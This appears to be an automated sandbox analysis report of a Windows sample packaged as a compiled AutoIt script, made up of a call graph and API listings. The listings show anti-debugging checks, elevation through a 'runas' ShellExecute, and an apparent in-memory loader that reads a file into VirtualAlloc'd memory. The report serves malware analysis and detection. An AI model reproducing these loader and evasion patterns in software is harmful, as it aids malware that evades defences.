TranslateAcceleratorW 88044->88047 88045->87013 88047->88045 88049 42602f 88048->88049 88051 40d17f 88048->88051 88049->87013 88050 42608e IsDialogMessageW 88050->88051 88052 40d18c 88050->88052 88051->88050 88051->88052 88588 430c46 GetClassLongW 88051->88588 88052->87013 88055 4096c6 _wcslen 88054->88055 88056 40a70c ctype _memmove 88055->88056 88057 4115d7 52 API calls 88055->88057 88059 4013a0 52 API calls 88056->88059 88058 4096fa _memmove 88057->88058 88060 4115d7 52 API calls 88058->88060 88062 4297aa 88059->88062 88061 40971b 88060->88061 88061->88056 88064 409749 CharUpperBuffW 88061->88064 88066 40976a ctype 88061->88066 88063 4115d7 52 API calls 88062->88063 88106 4297d1 _memmove 88063->88106 88064->88066 88114 4097e5 ctype 88066->88114 88590 47dcbb 194 API calls 88066->88590 88068 408f40 VariantClear 88069 42ae92 88068->88069 88617 410c60 VariantClear ctype 88069->88617 88071 42aea4 88072 409aa2 88074 4115d7 52 API calls 88072->88074 88078 409afe 88072->88078 88072->88106 88073 40a689 88075 4115d7 52 API calls 88073->88075 88074->88078 88091 40a6af ctype _memmove 88075->88091 88076 409b2a 88080 429dbe 88076->88080 88142 409b4d ctype _memmove 88076->88142 88598 40b400 VariantClear VariantClear ctype 88076->88598 88077 40c2c0 52 API calls 88077->88114 88078->88076 88079 4115d7 52 API calls 88078->88079 88081 429d31 88079->88081 88085 429dd3 88080->88085 88599 40b400 VariantClear VariantClear ctype 88080->88599 88084 429d42 88081->88084 88595 44a801 52 API calls 88081->88595 88082 409fd2 88088 40a045 88082->88088 88141 42a3f5 88082->88141 88096 40e0a0 52 API calls 88084->88096 88085->88142 88600 40e1c0 VariantClear ctype 88085->88600 88086 429a46 VariantClear 88086->88114 88093 4115d7 52 API calls 88088->88093 88089 408f40 VariantClear 88089->88114 88098 4115d7 52 API calls 88091->88098 88099 40a04c 88093->88099 88095 4115d7 52 API calls 88095->88114 88100 429d57 88096->88100 88098->88056 88104 40a0a7 88099->88104 88108 4091e0 315 API calls 88099->88108 88596 453443 52 API calls 88100->88596 88102 42a42f 88604 45e737 90 API calls 3 library calls 88102->88604 88127 40a0af 88104->88127 88605 40c790 VariantClear ctype 88104->88605 88105 4299d9 88109 408f40 VariantClear 88105->88109 88616 45e737 90 API calls 3 library calls 88106->88616 88108->88104 88113 4299e2 88109->88113 88110 429abd 88110->87013 88111 429d88 88597 453443 52 API calls 88111->88597 88592 410c60 VariantClear ctype 88113->88592 88114->88072 88114->88073 88114->88077 88114->88086 88114->88089 88114->88091 88114->88095 88114->88105 88114->88106 88114->88110 88119 40a780 192 API calls 88114->88119 88120 42a452 88114->88120 88591 40c4e0 192 API calls 88114->88591 88593 40ba10 52 API calls 2 library calls 88114->88593 88594 40e270 VariantClear ctype 88114->88594 88119->88114 88120->88068 88121 4115d7 52 API calls 88121->88142 88122 44a801 52 API calls 88122->88142 88124 408f40 VariantClear 88155 40a162 ctype _memmove 88124->88155 88125 41130a 51 API calls __cinit 88125->88142 88126 402780 52 API calls 88126->88142 88128 40a11b 88127->88128 88129 42a4b4 VariantClear 88127->88129 88127->88155 88135 40a12d ctype 88128->88135 88606 40e270 VariantClear ctype 88128->88606 88129->88135 88130 40a780 192 API calls 88130->88142 88131 401980 53 API calls 88131->88142 88132 408e80 VariantClear 88132->88142 88134 4115d7 52 API calls 88134->88155 88135->88134 88135->88155 88136 408e80 VariantClear 88136->88155 88138 42a74d VariantClear 88138->88155 88139 40a368 88140 42aad4 88139->88140 88149 40a397 88139->88149 88609 46fe90 VariantClear VariantClear ctype 88140->88609 88603 47390f VariantClear 88141->88603 88142->88056 88142->88082 88142->88102 88142->88121 88142->88122 88142->88125 88142->88126 88142->88130 88142->88131 88142->88132 88142->88141 88147 409c95 88142->88147 88601 45f508 52 API calls 88142->88601 88602 403e10 53 API calls 88142->88602 88143 42a886 VariantClear 88143->88155 88144 42a7e4 VariantClear 88144->88155 88145 40a3ce 88159 40a3d9 ctype 88145->88159 88610 40b400 VariantClear VariantClear ctype 88145->88610 88147->87013 88148 40e270 VariantClear 88148->88155 88149->88145 88174 40a42c ctype 88149->88174 88589 40b400 VariantClear VariantClear ctype 88149->88589 88152 4115d7 52 API calls 88152->88155 88153 42abaf 88157 42abd4 VariantClear 88153->88157 88165 40a4ee ctype 88153->88165 88154 4115d7 52 API calls 88158 42a5a6 VariantInit VariantCopy 88154->88158 88155->88124 88155->88136 88155->88138 88155->88139 88155->88140 88155->88143 88155->88144 88155->88148 88155->88152 88155->88154 88607 470870 52 API calls 88155->88607 88608 44ccf1 VariantClear ctype 88155->88608 88156 40a4dc 88156->88165 88612 40e270 VariantClear ctype 88156->88612 88157->88165 88158->88155 88161 42a5c6 VariantClear 88158->88161 88160 40a41a 88159->88160 88167 42ab44 VariantClear 88159->88167 88159->88174 88160->88174 88611 40e270 VariantClear ctype 88160->88611 88161->88155 88162 42ac4f 88168 42ac79 VariantClear 88162->88168 88172 40a546 ctype 88162->88172 88165->88162 88166 40a534 88165->88166 88166->88172 88613 40e270 VariantClear ctype 88166->88613 88167->88174 88168->88172 88169 42ad28 88175 42ad4e VariantClear 88169->88175 88180 40a583 ctype 88169->88180 88172->88169 88173 40a571 88172->88173 88173->88180 88614 40e270 VariantClear ctype 88173->88614 88174->88153 88174->88156 88175->88180 88177 40a650 ctype 88177->87013 88178 42ae0e VariantClear 88178->88180 88180->88177 88180->88178 88615 40e270 VariantClear ctype 88180->88615 88181->87013 88182->86965 88183->86970 88184->87013 88185->87013 88186->87013 88187->87013 88188->87022 88189->87022 88190->87022 88191->87022 88192->87022 88193->87022 88194->87022 88196 403cdf 88195->88196 88197 408f40 VariantClear 88196->88197 88198 403ce7 88197->88198 88198->87008 88199->87022 88200->87022 88201->87013 88202->86962 88204 408e88 88203->88204 88206 408e94 88203->88206 88205 408f40 VariantClear 88204->88205 88205->88206 88207 45340c 85 API calls 88206->88207 88207->87927 88208->87931 88209->87933 88210->87935 88211->87919 88212->87911 88213->87946 88214->87944 88215->87964 88216->87954 88217->87911 88219 40a7a6 88218->88219 88220 40ae8c 88218->88220 88222 4115d7 52 API calls 88219->88222 88261 41130a 51 API calls __cinit 88220->88261 88257 40a7c6 ctype _memmove 88222->88257 88223 40a86d 88232 40abd1 88223->88232 88236 40a878 ctype 88223->88236 88224 40bc10 53 API calls 88224->88257 88225 401b10 52 API calls 88225->88257 88227 40a884 ctype 88227->87964 88228 408e80 VariantClear 88228->88257 88229 42b791 VariantClear 88229->88257 88230 42ba2d VariantClear 88230->88257 88231 408f40 VariantClear 88231->88236 88266 45e737 90 API calls 3 library calls 88232->88266 88233 42b459 VariantClear 88233->88257 88235 42b6f6 VariantClear 88235->88257 88236->88227 88236->88231 88237 408cc0 185 API calls 88237->88257 88238 42bc5b 88238->87964 88239 4530c9 VariantClear 88239->88257 88240 40e270 VariantClear 88240->88257 88241 42bbf5 88267 45e737 90 API calls 3 library calls 88241->88267 88242 4115d7 52 API calls 88242->88257 88243 42bb6a 88269 44b92d VariantClear 88243->88269 88244 4115d7 52 API calls 88248 42b5b3 VariantInit VariantCopy 88244->88248 88245 40b5f0 89 API calls 88245->88257 88247 408f40 VariantClear 88247->88257 88251 42b5d7 VariantClear 88248->88251 88248->88257 88251->88257 88253 42bc37 88268 45e737 90 API calls 3 library calls 88253->88268 88256 42bc48 88256->88243 88258 408f40 VariantClear 88256->88258 88257->88223 88257->88224 88257->88225 88257->88228 88257->88229 88257->88230 88257->88232 88257->88233 88257->88235 88257->88237 88257->88239 88257->88240 88257->88241 88257->88242 88257->88243 88257->88244 88257->88245 88257->88247 88257->88253 88262 45308a 53 API calls 88257->88262 88263 470870 52 API calls 88257->88263 88264 457f66 87 API calls __write_nolock 88257->88264 88265 472f47 127 API calls 88257->88265 88258->88243 88259->87952 88260->87956 88261->88257 88262->88257 88263->88257 88264->88257 88265->88257 88266->88243 88267->88243 88268->88256 88269->88238 88270->87972 88271->87976 88272->87990 88273->87993 88274->87979 88275->87997 88276->88026 88277->87997 88278->88028 88279->87997 88280->88028 88281->88012 88282->88028 88283->88013 88284->88028 88285->88028 88286->88007 88288 4289d2 88287->88288 88289 408db3 88287->88289 88317 45e737 90 API calls 3 library calls 88288->88317 88315 40bec0 90 API calls 88289->88315 88292 408dc9 88293 4289e5 88292->88293 88295 428a05 88292->88295 88298 40a780 192 API calls 88292->88298 88299 408e64 88292->88299 88301 408f40 VariantClear 88292->88301 88302 408e5a 88292->88302 88316 40ba10 52 API calls 2 library calls 88292->88316 88318 45e737 90 API calls 3 library calls 88293->88318 88297 408f40 VariantClear 88295->88297 88297->88302 88298->88292 88300 408f40 VariantClear 88299->88300 88300->88302 88301->88292 88302->88034 88304 408f40 VariantClear 88303->88304 88305 403d20 88304->88305 88306 403cd0 VariantClear 88305->88306 88307 403d4d 88306->88307 88319 45e17d 88307->88319 88329 4755ad 88307->88329 88332 467897 88307->88332 88376 46e91c 88307->88376 88308 403d76 88308->88031 88308->88042 88313->88031 88314->88033 88315->88292 88316->88292 88317->88293 88318->88295 88320 45e198 88319->88320 88321 45e19c 88320->88321 88322 45e1b8 88320->88322 88323 408f40 VariantClear 88321->88323 88324 45e1cc 88322->88324 88325 45e1db FindClose 88322->88325 88326 45e1a4 88323->88326 88327 45e1d9 ctype 88324->88327 88379 44ae3e 88324->88379 88325->88327 88326->88308 88327->88308 88394 475077 88329->88394 88331 4755c0 88331->88308 88333 4678bb 88332->88333 88334 467954 88333->88334 88510 45340c 85 API calls 88333->88510 88335 4115d7 52 API calls 88334->88335 88362 467964 88334->88362 88336 467989 88335->88336 88339 467995 88336->88339 88514 40da60 53 API calls 88336->88514 88338 4678f6 88340 413a0e __wsplitpath 46 API calls 88338->88340 88342 4533eb 85 API calls 88339->88342 88343 4678fc 88340->88343 88344 4679b7 88342->88344 88345 401b10 52 API calls 88343->88345 88498 40de40 88344->88498 88347 46790c 88345->88347 88511 40d200 52 API calls 2 library calls 88347->88511 88350 4679c7 GetLastError 88351 467a05 88352 467917 88352->88334 88512 4339fa GetFileAttributesW FindFirstFileW FindClose 88352->88512 88361 467928 88361->88334 88366 46792f 88361->88366 88362->88308 88513 4335cd 56 API calls 3 library calls 88366->88513 88372 467939 88372->88334 88374 408f40 VariantClear 88372->88374 88375 467947 88374->88375 88375->88334 88528 46e785 88376->88528 88378 46e92f 88378->88308 88381 44ae4b ctype 88379->88381 88382 443fdf 88379->88382 88381->88327 88387 40da20 88382->88387 88384 443feb 88391 4340db 88384->88391 88386 444001 88386->88381 88388 40da37 88387->88388 88389 40da29 88387->88389 88388->88389 88390 40da3c CloseHandle 88388->88390 88389->88384 88390->88384 88392 40da20 CloseHandle 88391->88392 88393 4340e7 ctype 88392->88393 88393->88386 88445 4533eb 88394->88445 88397 4750ee 88400 408f40 VariantClear 88397->88400 88398 475129 88449 4646e0 88398->88449 88405 4750f5 88400->88405 88401 47515e 88402 475162 88401->88402 88439 47518e 88401->88439 88403 408f40 VariantClear 88402->88403 88434 475169 88403->88434 88404 475357 88406 475365 88404->88406 88407 4754ea 88404->88407 88405->88331 88483 44b3ac 57 API calls 88406->88483 88489 464812 91 API calls 88407->88489 88411 4754fc 88412 475374 88411->88412 88414 475508 88411->88414 88462 430d31 88412->88462 88413 4533eb 85 API calls 88413->88439 88415 408f40 VariantClear 88414->88415 88418 47550f 88415->88418 88418->88434 88419 475388 88469 4577e9 88419->88469 88422 475480 88424 408f40 VariantClear 88422->88424 88424->88434 88432 4754b5 88433 408f40 VariantClear 88432->88433 88433->88434 88434->88331 88439->88404 88439->88413 88439->88422 88439->88432 88439->88439 88481 436299 52 API calls 2 library calls 88439->88481 88482 463ad5 64 API calls __wcsicoll 88439->88482 88446 453404 88445->88446 88447 4533f8 88445->88447 88446->88397 88446->88398 88447->88446 88492 4531b1 85 API calls 5 library calls 88447->88492 88493 4536f7 53 API calls 88449->88493 88451 4646fc 88494 4426cd 59 API calls _wcslen 88451->88494 88453 464711 88455 40bc70 52 API calls 88453->88455 88460 46474b 88453->88460 88456 46472c 88455->88456 88495 461465 52 API calls _memmove 88456->88495 88458 464741 88459 40c600 52 API calls 88458->88459 88459->88460 88461 464793 88460->88461 88496 463ad5 64 API calls __wcsicoll 88460->88496 88461->88401 88463 430db2 88462->88463 88464 430d54 88462->88464 88463->88419 88465 4115d7 52 API calls 88464->88465 88466 430d74 88465->88466 88481->88439 88482->88439 88483->88412 88489->88411 88492->88446 88493->88451 88494->88453 88495->88458 88496->88461 88499 40da20 CloseHandle 88498->88499 88500 40de4e 88499->88500 88516 40f110 88500->88516 88503 4264fa 88505 40de84 88525 40e080 SetFilePointerEx SetFilePointerEx 88505->88525 88507 40de8b 88526 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88507->88526 88509 40de90 88509->88350 88509->88351 88510->88338 88511->88352 88512->88361 88513->88372 88514->88339 88517 40f125 CreateFileW 88516->88517 88518 42630c 88516->88518 88519 40de74 88517->88519 88518->88519 88520 426311 CreateFileW 88518->88520 88519->88503 88524 40dea0 55 API calls ctype 88519->88524 88520->88519 88521 426337 88520->88521 88527 40df90 SetFilePointerEx SetFilePointerEx 88521->88527 88523 426342 88523->88519 88524->88505 88525->88507 88526->88509 88527->88523 88529 46e7a2 88528->88529 88530 4115d7 52 API calls 88529->88530 88532 46e802 88529->88532 88531 46e7ad 88530->88531 88536 46e7b9 88531->88536 88576 40da60 53 API calls 88531->88576 88533 46e7e5 88532->88533 88541 46e82f 88532->88541 88534 408f40 VariantClear 88533->88534 88537 46e7ea 88534->88537 88538 4533eb 85 API calls 88536->88538 88537->88378 88539 46e7ca 88538->88539 88542 40de40 60 API calls 88539->88542 88540 46e8b5 88569 4680ed 88540->88569 88541->88540 88544 46e845 88541->88544 88545 46e7d7 88542->88545 88547 4533eb 85 API calls 88544->88547 88545->88541 88548 46e7db 88545->88548 88546 46e8bb 88573 443fbe 88546->88573 88554 46e84b 88547->88554 88548->88533 88550 44ae3e CloseHandle 88548->88550 88549 46e87a 88577 4689f4 59 API calls 88549->88577 88550->88533 88551 46e883 88555 4013c0 52 API calls 88551->88555 88554->88549 88554->88551 88557 46e88f 88555->88557 88558 40e0a0 52 API calls 88557->88558 88560 46e899 88558->88560 88559 408f40 VariantClear 88567 46e881 88559->88567 88578 40d200 52 API calls 2 library calls 88560->88578 88561 46e911 88561->88378 88563 46e8a5 88579 4689f4 59 API calls 88563->88579 88564 40da20 CloseHandle 88566 46e903 88564->88566 88568 44ae3e CloseHandle 88566->88568 88567->88561 88567->88564 88568->88561 88570 468100 88569->88570 88571 4680fa 88569->88571 88570->88546 88580 467ac4 55 API calls 2 library calls 88571->88580 88581 443e36 88573->88581 88575 443fd3 88575->88559 88575->88567 88576->88536 88577->88567 88578->88563 88579->88567 88580->88570 88584 443e19 88581->88584 88585 443e26 88584->88585 88586 443e32 WriteFile 88584->88586 88587 443db4 SetFilePointerEx SetFilePointerEx 88585->88587 88586->88575 88587->88586 88588->88051 88589->88145 88590->88066 88591->88114 88592->88177 88593->88114 88594->88114 88595->88084 88596->88111 88597->88076 88598->88080 88599->88085 88600->88142 88601->88142 88602->88142 88603->88102 88604->88120 88605->88104 88606->88135 88607->88155 88608->88155 88609->88145 88610->88159 88611->88174 88612->88165 88613->88172 88614->88180 88615->88180 88616->88120 88617->88071 88618 3f518e0 88632 3f4f530 88618->88632 88620 3f519c9 88635 3f517d0 88620->88635 88638 3f529f0 GetPEB 88632->88638 88634 3f4fbbb 88634->88620 88636 3f517d9 Sleep 88635->88636 88637 3f517e7 88636->88637 88639 3f52a1a 88638->88639 88639->88634 88640 42d154 88644 480a8d 88640->88644 88642 42d161 88643 480a8d 192 API calls 88642->88643 88643->88642 88645 480ae4 88644->88645 88646 480b26 88644->88646 88648 480aeb 88645->88648 88649 480b15 88645->88649 88647 40bc70 52 API calls 88646->88647 88666 480b2e 88647->88666 88650 480aee 88648->88650 88651 480b04 88648->88651 88677 4805bf 192 API calls 88649->88677 88650->88646 88653 480af3 88650->88653 88676 47fea2 192 API calls __itow_s 88651->88676 88675 47f135 192 API calls 88653->88675 88655 40e0a0 52 API calls 88655->88666 88657 408f40 VariantClear 88659 481156 88657->88659 88662 408f40 VariantClear 88659->88662 88660 40c2c0 52 API calls 88660->88666 88661 480aff 88661->88657 88663 48115e 88662->88663 88663->88642 88664 401980 53 API calls 88664->88666 88666->88655 88666->88660 88666->88661 88666->88664 88667 40e710 53 API calls 88666->88667 88668 40a780 192 API calls 88666->88668 88669 408e80 VariantClear 88666->88669 88671 480ff5 88666->88671 88678 45377f 52 API calls 88666->88678 88679 45e951 53 API calls 88666->88679 88680 40e830 53 API calls 88666->88680 88681 47925f 53 API calls 88666->88681 88682 47fcff 192 API calls 88666->88682 88667->88666 88668->88666 88669->88666 88683 45e737 90 API calls 3 library calls 88671->88683 88675->88661 88676->88661 88677->88661 88678->88666 88679->88666 88680->88666 88681->88666 88682->88666 88683->88661 88684 42b14b 88691 40bc10 88684->88691 88686 42b159 88687 4096a0 329 API calls 88686->88687 88688 42b177 88687->88688 88702 44b92d VariantClear 88688->88702 88690 42bc5b 88692 40bc24 88691->88692 88693 40bc17 88691->88693 88695 40bc2a 88692->88695 88696 40bc3c 88692->88696 88694 408e80 VariantClear 88693->88694 88698 40bc1f 88694->88698 88699 408e80 VariantClear 88695->88699 88697 4115d7 52 API calls 88696->88697 88701 40bc43 88697->88701 88698->88686 88700 40bc33 88699->88700 88700->88686 88701->88686 88702->88690 88703 425b2b 88708 40f000 88703->88708 88707 425b3a 88709 4115d7 52 API calls 88708->88709 88710 40f007 88709->88710 88711 4276ea 88710->88711 88717 40f030 88710->88717 88716 41130a 51 API calls __cinit 88716->88707 88718 40f039 88717->88718 88720 40f01a 88717->88720 88747 41130a 51 API calls __cinit 88718->88747 88721 40e500 88720->88721 88722 40bc70 52 API calls 88721->88722 88723 40e515 GetVersionExW 88722->88723 88724 402160 52 API calls 88723->88724 88725 40e557 88724->88725 88748 40e660 88725->88748 88729 427674 88735 4276c6 GetSystemInfo 88729->88735 88733 40e5e0 88736 4276d5 GetSystemInfo 88733->88736 88762 40efd0 88733->88762 88734 40e5cd GetCurrentProcess 88769 40ef20 LoadLibraryA GetProcAddress 88734->88769 88735->88736 88740 40e629 88766 40ef90 88740->88766 88743 40e641 FreeLibrary 88744 40e644 88743->88744 88745 40e653 FreeLibrary 88744->88745 88746 40e656 88744->88746 88745->88746 88746->88716 88747->88720 88749 40e667 88748->88749 88750 42761d 88749->88750 88751 40c600 52 API calls 88749->88751 88752 40e55c 88751->88752 88753 40e680 88752->88753 88754 40e687 88753->88754 88755 427616 88754->88755 88756 40c600 52 API calls 88754->88756 88757 40e566 88756->88757 88757->88729 88758 40ef60 88757->88758 88759 40e5c8 88758->88759 88760 40ef66 LoadLibraryA 88758->88760 88759->88733 88759->88734 88760->88759 88761 40ef77 GetProcAddress 88760->88761 88761->88759 88763 40e620 88762->88763 88764 40efd6 LoadLibraryA 88762->88764 88763->88735 88763->88740 88764->88763 88765 40efe7 GetProcAddress 88764->88765 88765->88763 88770 40efb0 LoadLibraryA GetProcAddress 88766->88770 88768 40e632 GetNativeSystemInfo 88768->88743 88768->88744 88769->88733 88770->88768 88771 425b5e 88776 40c7f0 88771->88776 88775 425b6d 88811 40db10 52 API calls 88776->88811 88778 40c82a 88812 410ab0 6 API calls 88778->88812 88780 40c86d 88781 40bc70 52 API calls 88780->88781 88782 40c877 88781->88782 88783 40bc70 52 API calls 88782->88783 88784 40c881 88783->88784 88785 40bc70 52 API calls 88784->88785 88786 40c88b 88785->88786 88787 40bc70 52 API calls 88786->88787 88788 40c8d1 88787->88788 88789 40bc70 52 API calls 88788->88789 88790 40c991 88789->88790 88813 40d2c0 52 API calls 88790->88813 88792 40c99b 88814 40d0d0 53 API calls 88792->88814 88794 40c9c1 88795 40bc70 52 API calls 88794->88795 88796 40c9cb 88795->88796 88815 40e310 53 API calls 88796->88815 88798 40ca28 88799 408f40 VariantClear 88798->88799 88800 40ca30 88799->88800 88801 408f40 VariantClear 88800->88801 88802 40ca38 GetStdHandle 88801->88802 88803 429630 88802->88803 88804 40ca87 88802->88804 88803->88804 88805 429639 88803->88805 88810 41130a 51 API calls __cinit 88804->88810 88816 4432c0 57 API calls 88805->88816 88807 429641 88817 44b6ab CreateThread 88807->88817 88809 42964f CloseHandle 88809->88804 88810->88775 88811->88778 88812->88780 88813->88792 88814->88794 88815->88798 88816->88807 88817->88809 88818 44b5cb 58 API calls 88817->88818 88819 425b6f 88824 40dc90 88819->88824 88823 425b7e 88825 40bc70 52 API calls 88824->88825 88826 40dd03 88825->88826 88833 40f210 88826->88833 88828 426a97 88830 40dd96 88830->88828 88831 40ddb7 88830->88831 88836 40dc00 52 API calls 2 library calls 88830->88836 88832 41130a 51 API calls __cinit 88831->88832 88832->88823 88837 40f250 RegOpenKeyExW 88833->88837 88835 40f230 88835->88830 88836->88830 88838 425e17 88837->88838 88839 40f275 RegQueryValueExW 88837->88839 88838->88835 88840 40f2c3 RegCloseKey 88839->88840 88841 40f298 88839->88841 88840->88835 88842 40f2a9 RegCloseKey 88841->88842 88843 425e1d 88841->88843 88842->88835 88844 3f51e8b 88845 3f51e92 88844->88845 88846 3f51f30 88845->88846 88847 3f51e9a 88845->88847 88864 3f527e0 9 API calls 88846->88864 88851 3f51b40 88847->88851 88850 3f51f17 88852 3f4f530 GetPEB 88851->88852 88855 3f51bdf 88852->88855 88854 3f51c10 CreateFileW 88854->88855 88859 3f51c1d 88854->88859 88856 3f51c39 VirtualAlloc 88855->88856 88855->88859 88862 3f51d40 CloseHandle 88855->88862 88863 3f51d50 VirtualFree 88855->88863 88865 3f52a50 GetPEB 88855->88865 88857 3f51c5a ReadFile 88856->88857 88856->88859 88858 3f51c78 VirtualAlloc 88857->88858 88857->88859 88858->88855 88858->88859 88860 3f51e2c VirtualFree 88859->88860 88861 3f51e3a 88859->88861 88860->88861 88861->88850 88862->88855 88863->88855 88864->88850 88866 3f52a7a 88865->88866 88866->88854
                          APIs
                          • _wcslen.LIBCMT ref: 004096C1
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • _memmove.LIBCMT ref: 0040970C
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                          • _memmove.LIBCMT ref: 00409D96
                          • _memmove.LIBCMT ref: 0040A6C4
                          • _memmove.LIBCMT ref: 004297E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                          • String ID:
                          • API String ID: 2383988440-0
                          • Opcode ID: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                          • Opcode Fuzzy Hash: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                          • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                          Strings
                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                          • runas, xrefs: 0042E2AD, 0042E2DC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                          • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                          • API String ID: 2495805114-3383388033
                          • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                          • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                          Control-flow Graph

                          • Executed
                          • Not Executed
